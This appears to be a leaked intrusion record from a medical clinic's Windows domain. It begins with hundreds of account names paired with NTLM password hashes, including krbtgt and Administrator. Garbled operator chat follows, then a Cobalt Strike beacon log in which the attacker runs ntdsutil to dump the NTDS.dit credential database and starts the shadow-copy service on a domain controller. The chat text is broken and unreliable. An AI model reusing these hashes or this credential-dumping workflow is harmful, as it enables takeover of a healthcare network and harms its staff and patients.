1231 dtbjork 46045df676465a5b2b8bf98e4615bacd 66080
2200 DR-SAMSON$ c5a616473f89642e2eb85e1556670cc7 4096
1634 WRC-DR$ 2a88b22201be0af7731f2d61edf4ec83 4096
2634 reringdahl d9a475be75065aae9e07e91ed2dfba4c 66048
1610 gwennordahl ac560e65500eb28945e5fe709a61039 512
2115 PATIENTACCTS02$ bea9eeb03c24458963bd882fc007e3f6 4096
2637 saolson a3174064e5df297ceaebaf4682a611ef 66048
1663 ADMIN11$ 5b8a979bb35799f2ffcb94e602765e08 4098
1838 kacarlsrud 69902cbb1f0753b0dd420ffe93d8c37f 66048
1357 PREREG05OLD$ 7a3ce4d803bb2ceb3e62be05077864d4 4096
1530 MEDTRANSMARILYN$ 79cbe72f19fa06d3615b5eb1d7c265fc 4096
1765 jodischmidt e638115d1bed2f4559e2724bf718c68c 512
1761 hmswenson 43bbea9c86860260bb062a7afb02f83d 66048
1306 PREREG02$ d2d251565b2617af100e3a42da1a60d6 4098
2120 BLCGWENNORDAHL$ 34fba012fac91c67b0abc6c83a2ef533 4096
1804 DR-BJORK$ bd991b081aa200289f265bf24c9f0296 4096
1511 carolynanderson $6e973177c2119f032711f9e1bb63c2ac 512
1514 maryannkugler 47db18043c3cfc26460098b23f9aac 66048
1467 clpahl b788d93e4ea6359d732a376c493fff8b 66048
2641 jphagen d8b2054e1b81a0ebf9680d7b2539a358 66048
2642 hmfoley 6408b8bbd9f73d3ce22b478957656334 66048
2643 cknelson 2ff9219189803bfacaa6ab5b16a7cebd 66048
2644 eboen 8e7459e6b38a6715c7537f8cd4cfcbb7 66048
1606 jemarquardt 98685dd2bf78647d14f0db5d9a4a9f84 66048
2645 kssem 646a976226faac0916e9789af9692bfd6 66048
2646 tmtarpley d9098a0547c911f6704df1f1fef9948b 66048
2647 trmurdock 84aeec4981e5a5d26cf316ae0647b152 66048
1453 mmmatthys 51b0b7d25592ab1612fb2e8479548daf 66048
1378 PREREG01$ 22cbbbe74aea12d6f5553946c7ed40e8 4098
1323 FAMILYMED02$ 90796bd8f3c6ca9e165bfb39fb82529e 4096
1393 mhaugen 14e6dcdaf76ac00823d3131a20034a35 512
1142 aevavold ecc56abc4486fbce0cbca1ef10c0a2bf 544
1557 kimborgos 9b71edf13ad0572d0c45e39996c93691 512
1328 PEDS01$ 2eac3f966ce03b9b84420da1eb988bea 4096
2196 ADMIN14$ cadaa67d74a5b10475a162883626eac5 4096
1797 mattflugstad 7b4f904f0a3767eab8f4dc0dcb83c783 512
1508 djboese 7c816d1b1d7332cb1006e75c6696ca95 66048
1832 enevavold b49f724ceb4bf0bfcac2e9e5b9af0390 66048
1597 TEMP01$ e27d80ce8f486f6ea70f7b2dec573f58 4096
2649 slaune 817a0349953470719e5c71ab0ba9718a 66048
2650 djcollins ce2867a41e585b0e419da424decc95ce 66048
1628 ericlokken debe275316ec95f77673a7094ce789d8 512
1836 emklemm aac1bffec43a308fe420edf27c34c086 66048
1180 sschlueter 3393f3a49a6a3c2a8233e7a29a7e8571 544
1539 FAMILYMED04$ 1fc8312cb97eed635566c595c3360053 4096
1207 dlembcke 9755affbd969d8b64821225cee8105e5 544
1322 FAMILYMED01$ 14ab3166a00551358504f0517044ec8b 4096
2163 DATAENTRY09$ 289d62338eb611b822bf50f32821bb5b 4096
1561 karaaxell b6585b2e5e494d90459e8b49a734318b 512
1330 OB01$ ed27abc006be74f70ca88bcc27d1341f 4096
2165 DR-FAMILYMED$ 87c2d0337a01fca5231b698daf9dcd81 4096
1141 dmoe d8a0a68924b7b8dad11e0940ee72a147 544
1191 cmindermann ddc0d48f1a551ff6d363075da87156d5 544
1600 OB02$ d37146eb251f844c54a15e8ef69e41d8 4096
1333 SURGERY01$ c333dccc03ac0f9533ff5c79203cc79d 4096
2176 MEDTRANS16$ 424628c70a696f86d3aaf053ac6c8514 4098
1551 cnlokhorst 6d019eb15ca3c7ee90b7f7793b78e036 66048
1149 jrhendel b71d24640b20a6dbc37be7d53e2ee467 66080
1213 pshol 8a94d4f8364a148658655222831e3024 544
1601 missyhalvorson fca4c011f682f0f3fa4f6d3a04ee4426 512
1318 PATIENTCARE01OL$ 884dc98711f6e32e2efc3d25ff26258a 4096
1456 smswiontek 229e88beb6ae9bea431e24279dbd2daa 66048
1225 amlewis 023785652249a821b0b9e45265c65fd5 544
1553 susanwoessner 7d769604287a3dc5fc34a4f622b791ee 512
2651 slpletcher 124513c6c851a7e030e4195ee096167b 66048
1174 rteberg 2536ca3621d2a556a95b90277c603478 544
1510 sbjohnson dee6f3cba2dc8623865d96f715edf5c6 66048
1228 bmharrington 8556eb9ac049c9da0a58aeefc33fe26 66080
2153 MEDTRANS19$ fe3ee30a000b50bffbc551f8d672bf36 4096
1569 llsternberg 3bfec37541454590f097d224fefad535d2 66048
1123 asievert 71a2ea36e010c680ca56837dca89cf98 544
1312 TEMP04$ c777984d36ec8bee411df0fd496ddb4b 4096
1397 CODING01$ dd54b460f0bc621d3c01ecb5c6c8b30d 4096
1623 dlhieronimus ab9ba244b8d32985f2a8e20af5febee4 66048
1593 ADMIN06$ 76ac5778c8cb4ba5db24a48946ba7c99 4096
1156 jhanson 3117b575da28313397c9f07fe0788161 544
1392 drobb fd5187235a3ea7cd03de399a0c7e60f7 512
2652 training1 5b4c6335673a75f13ed948e848f00840 66048
2653 training2 5b4c6335673a75f13ed948e848f00840 66048
1290 MEDICALTRANS12$ 7853157b9b745d070feae60b214d053a 4098
1218 slsem 5d018a45a9eb0473f3c3cd3718de6c3b 66080
1379 dblondeau 547cfb1788a7d82432937554ea25ee409 514
2639 jalaplante cbf9e0b72739278db0f82dee1fcea78d 66048
1669 DR-THOM$ 73814287ed9b1c974831be868b465292 4096
1667 drthom ce19b3c08eefb3c70f7ff8d635bca0ee 66048
1829 haottenbacher e957cf961db72e8b18461f42b32b8307 66048
1198 cstigen 5654690ff05f50725ceec956aff0368b 66080
2109 SURGENTONC01$ 2f034c2a1f40cfeb511d10e606ce37ef 4096
1776 tonyahaugen 48deb295316d246d254b26b4e92dda03 512
1429 INSURANCE03$ 74f59bf10ce03689e0712b4273ec0f1d 4096
1535 FAMILYMED03$ fe0710502a956e92384e7d9a7c8889e7 4096
1612 angelabradsteen dd410cd895b93b3934776adb54edba62 512
1367 WRCTRAN1$ f3c39d4c526c5538af06ee21a76e9200 4096
1167 molson 411ae78b736d4129ac0a703057740c47 544
1224 cljohnson 7e9bfc1129b337bdb60d0cb5be4247fc 546
1828 cleverding 3d2bf9da6ada0a0a4b3b3d46e9fe534a 66048
1134 cherylbarry c1dcee10f37da0dea2cce60897c2321a 544
1687 MEDTRANS25$ 5dca8d270c6882f44e9dd649f25f629d 4096
1178 scarter 00d89524084a96eaac5c40f51dfdf366 544
1176 sscott e278c482037f529bce78ceae66682bb6 544
1753 rachelvoll c9e4848f8e5f27b8b032574ba8b7749a 512
1502 vrode a4e86f232d9fcb641f74d5b9ff6f174c 66048
3106 klkeller 80c8b29db94ed0b30dcd438dfae41a50 66048
3107 nrweisenberger c5e0feb26fdbf60ea0e03383a29325bf 66048
3108 mmseidel ba4abe889054e18290060d89f206ae48 66048
1473 jdevries c4177c274066c380d41139e9d1fca44f 512
1683 FAMILYMED-NP$ 66901cbb214faa25bcfc5e7e8b204b93 4096
1402 medicaltrans2 f4332692c33d971140c51f1c13bea277 512
1152 jhammerot ddefb7e3b9fded75097dca0a01550e86 544
1159 lstrand 70fde05069984a79d00b146770495ee1 544
1370 whtnurse 9380147741154115433e6bda9436212b0e52 66048
1525 amasterman 723faab47a59cdf95f2d127b7a246477 512
1649 MEDTRANS23$ ed6eba734e562e8acf46cba80043e9e9 4098
1653 FAMILYMED05$ 992813fbd886480d285796002a5968d8 4096
1398 FAMMEDAPPT02$ c4d54a40e9d2589f3528639a1f3c1d81 4096
1442 cernerftp 45a3cb1686cf73e75de4575d13851ab0 66048
1826 crcolosky edebf24db8fd09f1a0f968a391cef2fc 66048
1564 karinelson 658969fcace05a933cbee707c4eef749 512
1773 djwest 20e57fe5249b0fdfbf6eae26e3b22339 66048
1701 DRLINDHOLM$ 965cc24ca05d1a94a37f22bf673c0a1b 4096
2198 DRKALIHER$ f4c0534510ae4428c775bdce52807c8e 4096
2187 BLNURSE01$ d36c9badcec99ad637ca21c1d0bebd40 4096
2183 WCHCNURSE01$ f471524d13af418c236669dd385cb574 4096
1579 INTERNALMED13$ bf26dcea9711e5d0caf310bddd1aeade 4096
1468 lnwohlenhaus e43f35677cec0cd6fbdd26f5f3d35722 66048
1548 joanneness 7eff3a0679e8f5f2eb76b153a9f29bc2 512
1282 jkaliher c59508253f1ba8a772ea7b39cabcf7dd 544
1547 cfvorland e8254befc20061f88fa9f42a41e0c8dd 66048
1588 INTERNALMED05$ 74dfc491aa9f632ae983e77a0ee992d6 4098
1434 CODING03$ 58dcbcae8d1e316e2bc1ec4775b14fc3 4098
1782 WCHCREC01$ e613f09276cef85f7dcad726d3cb0626 4098
1706 BLNURSE02$ 5c9fcf92a716ad5b280dd40e5c224ec5 4096
2166 INTERNALMED04$ 1772fedc1c75ddb0f732f6d82ec7542c 4098
1563 marciadillon 1ff36f57aff1d5db8800d2c785a0cae0 512
1314 EYECLINIC03$ f5e575e5035047984bd3ae88b1bb842a 4096
1281 plindholm$ c075a7246f4c8bef9d38a2d3a133bc2f 544
1629 DR-TONG$ ce9517b78f3c0d9af31f8db61b195c67 4096
1620 gjtong a5b7100b4aa7f8e93071be40f23b82b2 514
1713 PSYCH02$ 63cb7ec250904af4b7c8061f4b54f278 4098
1552 pltell 36c71052cc9f3df09b42f66f537ce603 66048
2144 ANDREWS$ 11acd59c59fc6defa1a51bf3fe0881f8 4098
1527 kevinshaikoski 172a3e327f8b438e17bf91c54c2f252d 514
1766 rebekahgraffunder 822ad3ce5ecce942944613d290a1f1 514
1454 dakempkes 7c36ee96da103a81763531f2ef613191 66050
1516 aprilklimp 6290bfeea1c751208379cee5ed256ead 66050
1743 loricodner e0173ccd6386a350351f9d52ee6c100d 514
1560 naomiolson da93b661760477edfc6ed312f935556e 514
3110 jllankow 2a45242c15f59e6db3c6fbd5da7e683b 66048
1544 ambest 4edc397bd51b40cbfb2596541127d304 66048
1545 machelleellingson ee75c6d3c79105d330c2bd99d5f16c13 512
1384 bness 44794d58c8ad82bd1b84d49ad357baa2 512
3105 INTERNALMED01$ b0dfb253773c6ddf3ec25a73411e47ea 4098
2191 UROLOGY03$ 44057957cb485b4ddc9b8cae7fcc1c0 4098
2164 INTERNALMED02$ 4b93eda1b8da8ddc653949f46724ccdf 4098
1144 hschwartz 0af153b7782e2bef7f22fe8701ff2127 544
1721 denellelshaug 6e00fa5bac85e2eb7d33137f568617f9 512
1695 pstoy 6f4f88cf36cefc95fd15f8050e443622 512
1385 mmoen 7e22d1e711e2bfcb3b2c539cde161983 512
2194 IT04$ c8ee40eba7ecec79acd94a7d0d3f18ea 4096
1147 jehlert 8c5be24a23f8376dc130a24f1579b6f3 544
1399 INTMEDAPPT01$ 7bb7aadf3d2b40e5f2223f4ae0801b29 4098
1840 evencmmr 82a26287c079231373962613246069c7 66048
1400 INTMEDAPPT02$ 1353ed719c6e123bea73764629151539 4098
2648 jmrolfes b5a5c6224f40840258f1bbd5d4b60fbb 66048
1490 dmschneider a15d8bcc287f442cfc33c52526ab0686 512
2157 INTMEDAPPT03$ 3d5b526687817f7f49cd290eeb54964d 4098
1194 chendrickson 99878c755fb267a08fe660dd78a42acd 544
1316 EYECLINIC01$ d4482fd2e501d0f9fed861b8a44606817 4096
2147 CREDENTIALING01$ 296a4b084c43dc8ce62f92e547a95827 4096
1541 jillbrethorst b72eb474b1a81360edce11f955161bce 512
1161 lveitenheimer a80c3b05e0ccda6f83b2cb351ac4e1ae 544
1699 DR-STOY$ a8fe39e3e13ddd6a2ba2f1f05d23b19e0 4096
1808 nSpire Health 18ed4f4a43886dd171e7ab736541d76e 66048
1703 DR-GUNDERSEN$ 3bcc9a3d703dc8dbb67b4d3f33f47f3d 4096
1702 markgundersen 13490c009d26bcb6d231f1316ce062b1 512
1604 janicespies 542194ccf81d43b11bbae6a7f4c9aef9 66048
1692 mattmouser b56354d9266cba25422ab15e8547bcf5 512
1805 PULMONARYFUNCTI$ b4ac4781048ae6bc156b35374c720236 4096
1691 DR-MOUSER$ 74904c49f700c9e15f16d00a98554379 4096
2192 WCHCDR01$ b5b287ce3c338de11db07f943c7f6f53 4096
1395 sgallagher a0739df192b64e0aeca567856e913705 66048
3112 aeroberts 13036200cef18a0854f1dd70cc88c584 66048
1677 NURSINGSVC02$ 700b442ec8d3c24b15e0f0176910aad8 4098
1676 NURSINGSVC01$ d6b73ca78b54798073325bdea19cee3e 4098
2152 MEDTRANS13$ 5d0f76df54a3dbed955fcea211f5f0fb 4096
1655 leannrogness 5f8067b5789c266da48ba92406cc5294 512
1631 kathystaples 5f0d75e121e61086b26b54f7eb9f20b8 512
1166 mtonneson 4de8a532a09d5b9eb19e07b89a49b115 544
3114 mebruininga 12050de9174a28b116fd22989bde2b10 66048
3115 vfuhren 2bbac362a13887c361297c7162bb9db8 66048
3117 kagraff 2044f66498f0c00f498578399f0321a0 66048
3116 krcave 5dfd676a553b492038ec102aa87c6881 66048
1632 EKG01$ 5bdbe0a1bcbb964a45580e623a35a2d5 4098
1639 EKG02$ 048090faec12de815a1f6eaf1bd8bb6a 4098
1160 lakress e0f69fcbdc87a5416eb39b3bd8d854a0 544
1499 MEDTRANS15$ 6cc1aa413d4a07964f07cb8076c3bdbc 4096
1644 COUMADIN01$ 5aea7c089660ac3160589fdc725a131b 4098
1594 jillhaarstad dc4ad240083c4b5e225d663f665df425 512
2156 ASHBY01$ 2daa327a11da7616e6a003c37b068393 4098
2121 CODING08$ b38d8949a9780a8200accd4bdd31946c 4096
2199 ADMIN17$ 968c5bbe05450a1d3edc5cfb9023a3da 4096
1422 jgregor 9d8675b2b751eb80f9e7dd44ae20c804 512
1732 ADMIN13$ 430ff2671e737ebd75cd281de29e3951 4096
1491 amyeggen 14437b13fa716df7f0e4946d40e76e4 512
3113 klpetersen b2b1ec98869242a0bf4679c26e2423d4 66048
3118 tmumlauf aa09adad01510f97e46b6c4bd2b69d05 66048
1696 kirstenkragness 3e0841fed5cc10c48ab3ce07bfe3f8b5 512
2127 MEDTRANS14$ 31ad33f98e82e243e3b3cf4ee987d7a0 4096
1792 mariebraaten 638ec491ee8c4e668300716fa5b5413a 512
1794 MARIEBRAATEN$ 158b0ed3305ce77d6b730455f4ac710 4098
1185 tkingston a4d9ff4db31b133550e1c7edaad3a512 544
1157 kolson 39efab3df60b62e4ffad0fc3b9e0870d 544
1622 TEMP03$ 97ac7fb1237e7f6e0bd92fde0187c4ff 4098
2172 TRAINING20$ da302136f0b1541ecef05186d67853b1 4098
2179 MEDTRANS31$ 559e1cb97968f19c7b79b3a85b463148 4098
1626 sknohre 7046e2789522b425e06c93a2c948630f 66048
1177 sjurgens 3d0eea1cfc5228ec422bdb14b6f405c3 544
2118 EYECLINIC05$ 3c5e9b307d98163b0f1cae00271dc08f 4096
2117 EYECLINIC04$ 5ee1856892069fc5432be1cc485306be 4096
2113 INSURANCE02$ 05081de692e8edf7dbc363b7cac4f982 4096
1501 PATIENTCARE03$ e6eae8c4cb8808079dfafe61b5352887a2 4096
1373 APPTPOOL2$ 3472ed81cd705d6f69d60413888bf100 4098
1375 APPTPOOL4$ 15c9d9f93e25839c80701535afb06a5d 4098
1376 APPTPOOL5$ 5b70cb98e678198f1209b5f8d141af34 4098
1172 pbutcher 62de4b93217ca34b98914535c6e90ee4 544
1372 APPTPOOL1$ af0ee09d232222ad1f2fdf0998946ad73d 4098
2112 APPTPOOL3$ dd85150ecdfae3d23b8f084d7f40bc00 4098
1390 jnelson 9b83e29ef8dde235ec54f98d1beffd01 512
1136 cahayden a0ceddbb1aa337c1af6b4d94e28ba584 544
1538 ENT01A$ a7205703cee8c8cdaf43a0e2a2f46268 4096
1645 wbellman 386d36464667d804aee10c6b8c561bba 66048
1790 MEDTRANS32$ 7dad9afd22753dbefe92c9c26eedafc0 4098
1784 susanmeland f0c5893d75e69a7f7fa768c660d54a55 512
1751 cathefinkelson d9adb2f60146b347249ee9c72b32e168 512
1783 DR-MELAND$ 090b63798080dd2011c08f10eb74c2af55 4098
1423 bonken 1455893cf488171aac6bdf8f38806f02 512
2119 CODING02$ f5ae2004ffb0189f43a20c40101f09de 4098
2122 CODING09$ e48d5d0cbfdada49caf240f967780290 4098
1437 CODING06$ 3c92e31422e99914a62d1ef17c7e9079 4098
1770 acrobatrunner b35c2063adb8a54b6c5311252233ba35 66048
1421 kldolan 70df97f613652cfbf1b71477729acac3 66048
1435 CODING04$ 60dedcde71c812ce6780560fd69e6542 4098
1642 danderson 57221216bd45b5dfe4a25b4d153f8b7f 66048
1424 jsonmor 23ae3d1dc042d46e3d48bcffa6135611 512
3119 jlknudson 6c1d6e6f39f347c9fe477848cca619b0 66048
1386 dweber e7d216ef2034254bccb3be5aaac569fb 512
1731 luellawilde b741cc9db976bd18d8f1b91310a630c8 512
1403 SURGENTAPPT02$ 2a15b5a7c43cc916e6abbdda0cf62d3e 4096
1724 MEDRECORDS12$ 9f26b4e815a8ce8009dea4920d6cddfc 4096
1500 CODING10$ 4d43fc92304d6ce3c2ae8abbcd2b82f6 4098
1436 CODING05$ 96d93098e5e4fd1cedf32bc5e507c721 4098
1497 thurley bdcb6ed5aaf69ecf3caaf6ded34ed187 512
1317 PATIENTCARE02$ 013ccea833864184915572aea6365f3e 4096
1831 camavis 90f90b95d77ecb3778195ca19b9563ea 66048
1146 jashaikoski 8384445ee87621f5ec558039a4631833 66080
1720 maryabel 46367430424fbf5c2fd1adfd380c9e81 512
1605 fayeluedtke 70febca3d46411d71e9f50e49f9a182d 512
1485 kthompson 5fe0547692cbee29eb92f4b698c9fa28 512
1364 ENG01$ 9df2339a964df1a4e0d85d2ca6d8d4a4 4098
1693 lindazumwalde e0310fc15582693dba137f3e93c155ca 512
1712 MEDRECORDS06$ f372076b23c85f422c35f47616176c86 4098
2189 MEDRECORDS08$ 6df2272cb95f3f6af051b7737bea9eac 4098
1718 MEDRECORDS10$ 3252dda8926954e94867f55a7e7d8d9d 4098
1503 MEDRECORDS05$ 6ca331809512429a2b9edd3f9cf9c407f 4098
1299 MEDRECORDS01$ 4d709f5e955d8e32174979ba2b1f5cd2 4098
1192 gsmith 05f6a65ad9c1fb1c9abf6899ac55a7d8 544
1165 medrechsel 79d4f47bd7b89fa72e6b9f0719fd6ac9 66080
1722 carmenharthun c4de1a0ae7f923d7861b1bed5d2019e9 512
1762 ADMINLAB$ 621078dec419cc0153ec2ea362014893 4098
1725 IT03$ 50edfa32dcce01dbce63fc9e449c9557 4098
2180 LAB-CE$ 7c23bff5b540f96e98adef97ad3d863bf 4098
1277 tbeckman 64fcf9524a8d61554c06b754fe1dadbd 544
1428 DATAENTRY03$ 89017be548f1b27c632bbe4b8e821b06 4098
1349 SUPPLY01$ c52c16282789ab761cd4ea92b1c05209 4098
1736 paristurchin 336939d0398c5016ce01ad37d23489d0 512
1680 michaelstreeter af75fd1d30727b604e54cb0404b9aa73 512
1348 SUPPLY02$ bf38f8f55f5518ef5cedf5d5e8870606227 4098
1830 kmtripp 9b2c87cfc4d6968b0ed10630b6138a80 66048
2205 MEDRECORDS09$ b495b0e02995c7160a4d3776173696b7 4098
1138 dbickett 919673f08ba0c45e38f9ba80a6cf6743 544
2206 HIS02$ aaadb45ca5308c8b2dc85ab2ca9f88fd 4098
1759 jlthunselle e4c329e69525291304a7d2807c89477b 66048
2154 MEDTRANS18$ 37943d911273289823301046e409270e 4096
1484 ce 16a0d9d05151fbec94d639acd77de80f 512
1162 lmartinson 828c06926dd7bf768f221da9536d81e6 544
1734 dantraiser 6f8b963b591710020e97282122d76d6d 512
1733 DR-TRAISER$ bc9a39b235088b15aed358218054ffb4 4098
1155 jteberg 285be705f27066ffeb749df472526c40 544
1834 DATAENTRY05$ 5ce664f9069ad66cfe028c8006263b86 4098
1752 daynaerlandson d04abeb82271f38086e50647d70fa40c 512
1294 MEDTRANS08$ b48bd52d07c6dd1c034dcd948d45cf2f 4098
1709 larryeisinger 26c5286aad4cc5a67d6c1b498ba66878 512
1686 markiekolle 018f65735e1074613ff794f9b92e7b02 512
1707 DR-EISINGER$ 1943833f411bc4b3a51ae287cbacec4f 4098
1122 avolden$ 298fb92a616f5da3eb1864e5d735752b 544
1689 MEDTRANS26$ e0ed30831a40022ba6c8a732e77a0a46 4098
1124 abratvold 5a5f7930e60d529ec0bb0a8879c6eee1 544
1587 DATAENTRY06$ 6a281a5c3158a4a3576100009ba280fa 4096
1276 jrandklev$ 2434fbe3038f32d0d1544013f0844afe 544
1302 HIS01$ 720e44a6eb61ea47d68cc27f40d6177c 4098
1581 delreynolds e4778cc4b69b5fc1eae8aa49eb804639 66048
1401 rerickson 401d242537a8f35c06b50019a44791f9 512
1730 ksdenker 2d782825f402ebf523ce5422c31a5227 512
1774 ADMIN15$ ebc356bc3ea81b6273c92586bf76561c 4098
1131 blaplante 8b724fbf190e7209879b9a1b89718dc9 544
2186 MEDTRANS29$ c08b9170bfb281c2d35b1228f395e8d0 4098
1382 sltripp 66542a4a152b38d00dd42533f8953770 66048
2195 MEDRECORDS14$ 4905614a001a41b372a881c9f76cc026 4098
1641 MEDTRANS21$ d849917f9b96d5810b6e027c485e5c90 4098
1708 eawilliams 36f8dee2ff0c6e543fd59c047f67c8d2 512
1714 DR-WILLIAMS$ 359792954bf28f2d0836c7967b256b4b 4098
1717 kayhutmaker$ 104a6f91703ac0329a712517baffa744 512
1775 MEDTRANS30$ d82e98e8f2a6e8c61b354e23de0122b2 4098
1607 gdhoff 86f6f2a7d63c02a5e599b1f921fe3ed3 512
2184 MEDTRANS28$ 6ba60bc00f1be322456fce022f1665ce 4098
1381 jkummrow 1b5b791b7e471036ce91137bc46d7386 512
1389 jrosin e05b3ccb827fc73e848e2e0646cd7a67 512
1728 OBPEDSAPPT02$ 23449777b9231d2d628efb4e47036d2c 4098
1173 rhammer b62f335f1eb14d11d05b7907baebb25b 544
1690 MEDTRANS27$ e0019570012f7329ccb2bd5e325fca95 4098
2178 WINSCRIBE$ 71d4de1e32f49a3ae2fbf8eb9e786db9 4098
1498 bhensch 916e7c5dfbec96e4d35447cb6b8f806e 512
1391 vmlink 08fdb4e2e1079a9a4a945028b6ab145a 66048
1179 sadavis 29891948443c85202ac9577e9e697e39 66080
2108 OBPEDS01$ 5f2193fb711f90a25eb7c8c399076d37 4098
1657 INSURANCE10$ e262ea6b7c8dad65f3f8e58eff54a898 4096
1387 mrloomer 57ea43193566ca1253347cd3afc1adb4 512
2654 bmschaible 67613f04680f8da46b2e6579a5205e46 66048
1135 cschmidt 37f1101464c66c68e5c512f9e1491fe7 544
2162 ORTHO01$ d338616df9cc1d70fa2e08e172315675 4096
1727 ffmaas 5cadeb11a161c1a7417ba56926de364c 66048
3111 nlppreston b80247b675268f128aadab632bdfcbab 66048
1739 juliannegutzmer 3f9bfd262caed9b0918ff698f290d982 512
1738 DR-GUTZMER$ 519cef4a3d321df140ad54821a2a7497 4096
1715 ffmbbs f06a94213f76b2f61caec468d45dfca4 66048
1716 ffmccs d10b57d2c5e69612b00c5c82121ce63f 66048
1719 MEDRECORDS11$ d0cb151bf2325184a0de92cf4e3e6248 4098
1710 MEDRECORDS07$ a4687be951806e156685748ba68233ed 4098
2167 TEMP02$ f3f68ee581369da5d6d1072387d062c1 4096
1537 KINETX$ 0e2b2c7d94ba335b9e6c80064d863043 4096
1197 mjacobson 83dc1589b41accbc0d5f04fd6aad4630 66080
1480 ADMIN03$ 0a73059f17e014e9172d8ffb138ceb85 4096
2158 QI01$ 58bab78a3981f067f8b2f12081b0635e 4098
1787 mardelle2 2297d8cf9db7ef8e80db486710b082c6 512
2636 jcbengtson 71c261a2f43ffe580f929d63cc07f70c 66048
1637 jdpeterson 4f48102cd374701781ed3036f4f83829 66048
1613 ADMIN07$ bd487166d574a7d1d59bd4fea97dc7a1 4098
2155 ADMIN05$ 266291d521f651cefcc7277fc25b3cb2 4098
2202 CLINICDC2$ be3a8c6316fbc0d4a155218bc4a93bae 4096
1446 replicadb 3b89729a25618c03434dc1275fe496ef 66048
1439 REPLICA$ 3d57307d1f18c68e42f4fcbabaeae4be 4096
1438 REPLICAFS1$ 310cd89aa1613a6a62349fcef6241d8f 4096
1576 LIGHTSPEED$ c7c102c07f6595952417b47b5f997412 4096
2126 IWAM_CLINIC2 686fd72eb5e43917c12bb5d41e7d1571 66080
2640 slmontella 339a9f43281e1d64712917d8b34ab34e 66048
1532 bjfindley 4fa0eb1764110e17db8dca13083c9df4 66048
1181 skilde 963c613cd50f2329f8eb925269a4b629 544
1583 ambetlach bfb0556340211875cd1cfc20e151aa69 66048
1493 ADMIN01$ e963b81b5a2f9242cd78d52d4d1e99f0 4096
1199 kpeterson 5b4c6335673a75f13ed948e848f00840 66080
1195 dktoso 69cb9baf0f396225965fd96c89102c92 544
1278 ldsander e2a2964ed651c0f7ba4ec81dd01e02aa 544
1137 dmanderson 07777311adb9fea327708e8b1ff840ea 66080
1555 smrodriguez afde914ef03a7f99c1e400d70451a5c2 66048
2638 kjbockman 5cb6367e176a3a44fd38aac5e1a51d 66048
1377 CLINIC2$ 660b3b39a9c4bd6420f0718d6d26cd80 532480
2125 IUSR_CLINIC2$ 5065cfab3c248199d577f2ca163213e6 66080
1785 smwhite 79689536e1dc2b70ae72862d77f966e6 66048
1154 jrdimke 1384e297265d100a0116e95f6b08d484 66080
3109 nrgeiszler 2a537afe9be53ebfabebf00c5b7c0c56 66048
1760 paragonrunner 03cc1b1a34914c14a3a44d06aab0a01b 66048
1554 sdthormodson 9e0add2cee1b4c84a7bb6d39456b32f3 66048
502 krbtgt bc039777432092c373c4760ae8907cbc 514
1001 SUPPORT_388945a0 f72f792aaf39648489e5865c72fd763a 66048
1664 petekuttera e65e7043f9e8c2321284f39e830a51ba 512
1184 tkadmin 81199155c72235ba7ee1e4b39da00702 544
1665 glendahoffa 94de31b62705ce9e325a95982e42752c 512
1003 beadmin ee32e572565734a3322bbd2fd90fd750 66048
2655 allscriptsadmin a1b22e43fe47976bb230e1e3497576bf 66048
2657 SophosSAUCLINICDCaa 1c1095437ae57d2ba6234c2615241519 66048
1550 mmlaugtug cfe2ff7138ac7cdc3ff264ea8b2a2e20 66048
1820 LRHC$ dd20d36f182fee4dad615eee4384046f 2080
2201 CLINICDC$ 690e62a948fd60c5c42cfddacdfeb106 532480
2656 PAULSANDERSON$ e6b7f965ec1dff907e9e9ee6158e4f10 4096
1004 CLINIC$ 174b5ffdef84b0c4b86f9ad41bface94 4096
1242 psanderson 8a48ebb4e8aadeb8f71b999ba84ab520 66080
2145 AUDIOLOGY2$ 6e02b8d4411ecbde4d04abad2d097bfb 4096
1189 WinScribe 3d1a6aecc94c7ca42f1687fe84466dc3 66080
1255 lkkrog a420b3f79ddc9eaa1155897dbac8ae7a 66080
1425 dastone 38abadb3519dc46f5290da34e1edb7f8 66048
1220 ljbecker 712eac9ea2f2a45f40d1e2b13bbf1d5d 66080
1148 jcjohnson 792508dbd7d9693b9e7ce078e9c43885 66080
1186 tleliason af61440f9a461322e1c2fc7b5e0c28de 66080
500 Administrator 8cb7e0d1806e8bb55dee9954e2d8bdfd 66048

``Everything works okcredits but the session does not arrivenu there is a quarantine still+yet even server 2000 it is the last impregnable trust? in this trust all XP and 2003vot so there dk 2003 x32? seriously?but it worked fine and in the input domain was sofossofos in all the trusts what os? and the text is shifting itself like this just sit there is a line transfer? check it in the batcik it is yes i copied here crookedly2) where is the last q?
```
ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\ntds" q q
``1) check if ntdsutil.exe is not complete
Teemo[LRHDC03]SYSTEM */556|2020Dec18 21:26:49> shell type \\CLINICDC\C$\toddcommands\1.txt
[*] Tasked beacon to run: type \\\CLINICDC\C$\toddcommands\1.txt
[+] host called home, sent: 68 bytes
[+] received output:
ntdsutil: ac in ntds
Error 80070057 parsing input - illegal syntax?
ntdsutil: ifm
Error 80070057 parsing input - illegal syntax?
ntdsutil: cr fu c:\toddcommands\ntds
Error 80070057 parsing input - illegal syntax?
ntdsutil: q

``now again puneomotecheck if the service is disconnected and the assumption was made that we have only redirected to the file browser and also to begin with show the outputIt happens that ntds catches an error or something else then the path is more complicated what does thetasklist say?there's someone stop the service through the file browser and I don't see the command dir c:\windows\temp\nds and the easiest way to find out what's wrong is to redirect the command to the file on the desktop.
Teemo[LRHDC03]SYSTEM */556|2020Dec18 21:03:14> shell sc \CLINICDC query vss
[*] Tasked beacon to run: sc \\CLINICDC query vss
[+] host called home, sent: 54 bytes
[+] received output:

SERVICE_NAME : vss
        TYPE : 10 WIN32_OWN_PROCESS
        STATE : 1 STOPPED
        WIN32_EXIT_CODE : 0 (0x0)
        SERVICE_EXIT_CODE : 0 (0x0)
        CHECKPOINT : 0x0
        WAIT_HINT : 0x0

Teemo[LRHDC03]SYSTEM */556|2020Dec18 21:03:30> shell sc \CLINICDC start vss
[*] Tasked beacon to run: sc \\\CLINICDC start vss
[+] host called home, sent: 54 bytes
[+] received output:

SERVICE_NAME : vss
        TYPE : 10 WIN32_OWN_PROCESS
        STATE : 2 START_PENDING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE : 0 (0x0)
        SERVICE_EXIT_CODE : 0 (0x0)
        CHECKPOINT : 0x0
        WAIT_HINT : 0x0
        PID : 53772
        FLAGS :

Teemo[LRHDC03]SYSTEM */556|2020Dec18 21:03:49> shell sc \CLINICDC query vss
[*] Tasked beacon to run: sc \\\CLINICDC query vss
